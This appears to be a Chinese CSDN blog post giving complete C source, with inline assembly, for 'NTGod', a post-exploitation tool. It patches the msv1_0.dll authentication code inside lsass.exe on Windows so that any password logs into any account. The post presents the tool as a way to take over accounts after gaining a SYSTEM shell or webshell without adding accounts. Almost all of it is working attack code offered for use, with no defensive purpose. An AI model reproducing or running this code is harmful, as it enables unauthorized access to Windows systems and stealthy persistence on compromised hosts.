NT上帝模式源码

//换下思路,webshell(个别变态机子)提权也可以使用,有木有?

NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。

情景再现: 当你在进行主机安全检测时,获取了SYSTEM Shell,以前会想办法获得administrator等帐号的口令,使用gina窃取、sam hash破解、增加管理帐号等,而现在直接执行 ntgodmode on 就可以轻松登录任意帐号。登录完毕后,ntgodmode off,关闭上帝模式。

#include <windows.h> 
#include <tlhelp32.h>
#include <stdio.h>

// 提权函数 
BOOL EnableDebugPriv(void) 
{ 
    HANDLE hToken; 
    HANDLE hProcess = GetCurrentProcess(); 
    BOOL bREt = FALSE;
    if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | 
        TOKEN_QUERY, &hToken) ) 
    { 
        TOKEN_PRIVILEGES tkp; 
        if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) ) 
        { 
            tkp.PrivilegeCount = 1; 
            tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL,  0); 
        } 
    } 
    CloseHandle(hToken); 
    return bREt;
}

// 获取目标进程Pid 
DWORD GetTargetPid(char *pn) 
{ 
    BOOL b; 
    HANDLE hnd; 
    PROCESSENTRY32 pe; 
    hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    pe.dwSize = sizeof(pe); 
    b=Process32First(hnd, &pe); 
    while(b) 
    { 
        if (lstrcmpi(pn, pe.szExeFile) == 0) 
            return pe.th32ProcessID; 
        b=Process32Next(hnd,&pe); 
    }
    return 0;
}

// 获取特征码偏移 
DWORD GetSinatureAddr(char *dn) 
{ 
    HMODULE hLib; 
    DWORD dwSinatureAddr; 
    hLib = LoadLibrary(dn); 
    if ( hLib ) 
    { 
        // 特征码校验 
        __asm 
        { 
            push ebx 
            mov dword ptr [ebx], eax 
            xor eax, eax
check_1_start: 
            mov eax, dword ptr [ebx] 
            cmp byte ptr [eax], 0x8B 
            jnz short check_1_end 
            mov eax, dword ptr [ebx] 
            inc eax 
            cmp byte ptr [eax], 0x4D 
            jnz short check_1_end 
            mov eax, dword ptr [ebx] 
            add eax, 2 
            cmp byte ptr [eax], 0x0C 
            jnz short check_1_end 
            mov eax, dword ptr [ebx] 
            add eax, 3 
            cmp byte ptr [eax], 0x49 
            je short check_2_start 
check_1_end: 
            inc dword ptr [ebx] 
                jmp short check_1_start
check_2_start: 
            mov eax, dword ptr [ebx] 
            cmp byte ptr [eax], 0x32 
            jnz short check_2_end 
            mov eax, dword ptr [ebx] 
            inc eax 
            cmp byte ptr [eax], 0x0c0 
            jnz short check_2_end 
            mov eax, dword ptr [ebx] 
            push eax 
            lea eax, dwSinatureAddr 
            pop dword ptr [eax] 
            mov eax, dword ptr [ebx] 
            jmp short check__over
check_2_end: 
            inc dword ptr [ebx] 
            jmp short check_2_start
check__over: 
            xor eax, eax 
            pop ebx 
        }
    }
    else 
    { 
        printf("Failt to found the Sinature offset.\n"); 
        return -1; 
    }
    dwSinatureAddr = dwSinatureAddr - (DWORD)hLib; 
    //printf("%08x , %x\n", dwSinatureAddr, hLib); 
    FreeLibrary(hLib);
    return dwSinatureAddr;
}
// 获取msv1_0.dll在内存中的基址 
DWORD GetModBase (DWORD dwTargetPid, char *dn) 
{ 
    DWORD dwModBase = NULL; 
    HANDLE hModuleSnap; 
    MODULEENTRY32 lpModInfo = {0}; 
    BOOL bModule = NULL; 
    lpModInfo.dwSize = sizeof(lpModInfo); 
    hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,dwTargetPid); 
    bModule = Module32First(hModuleSnap, &lpModInfo);
    while ( bModule ) 
    { 
        if (lstrcmpi(dn, lpModInfo.szModule) == 0) 
        { 
            dwModBase = (DWORD)lpModInfo.modBaseAddr; 
            //printf("%x\n", dwModBase); 
            break; 
        }
        Module32Next(hModuleSnap, &lpModInfo); 
    }
    CloseHandle(hModuleSnap); 
    return dwModBase;
}

// 虚拟地址转换 
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase) 
{ 
    return (dwSinatureAddr + dwModBase); 
}
// 去密码函数 
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr) 
{ 
    HANDLE hProcess = NULL; 
    char buff1[] = "\xB0\x10"; 
    char buff2[] = "\x32\xC0"; 
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid); 
    VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid);
    if ( lstrcmpi("on", checkbuff) == 0 ) 
    { 
        WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0); 
        printf("Open God Mode"); 
    } 
    else 
    { 
        WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0); 
        printf("Close God Mode"); 
    }
    VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);
}

// 版权函数 
void CopyRightInfo() 
{ 
    printf("------------------------------------------\n"); 
    printf("RNtGod\n"); 
    printf("Author: Cyg07\n"); 
    printf("Reverse from golds7n[LAG]'s NtGod\n"); 
    printf("------------------------------------------\n"); 
}

int main(int argc, char* argv[]) 
{ 
    CopyRightInfo(); 
    if (argc < 2) 
    { 
        printf("Usage: %s On|OFF\n\n", argv[0]); 
        return 0; 
    }
    char *DllName = "msv1_0.dll"; // Dll 
    char *ProcessName = "lsass.exe"; // 进程 
    DWORD dwModBase = NULL; // dll在内存中的基地址 
    DWORD dwSinatureAddr = NULL; // 特征码偏移 
    DWORD dwSinatureVirAddr = NULL; // 特征码的虚拟地址
    dwSinatureAddr = GetSinatureAddr(DllName); // 获取特征码偏移
    if ( EnableDebugPriv() == NULL ) // 进程提权 
    { 
        printf("Failt to enable debug priv.\n"); 
    }
    DWORD dwTargetPid = GetTargetPid(ProcessName); // 获取 lsass.exe 进程 
    // printf("%d\n", dwTargetPid);
    dwModBase = GetModBase(dwTargetPid, DllName); // 获取基地址
    dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr, 
        dwModBase); // 转换特征码在内存的虚拟地址
    // 密码处理函数 
    FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr);
    return 0;
}


  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值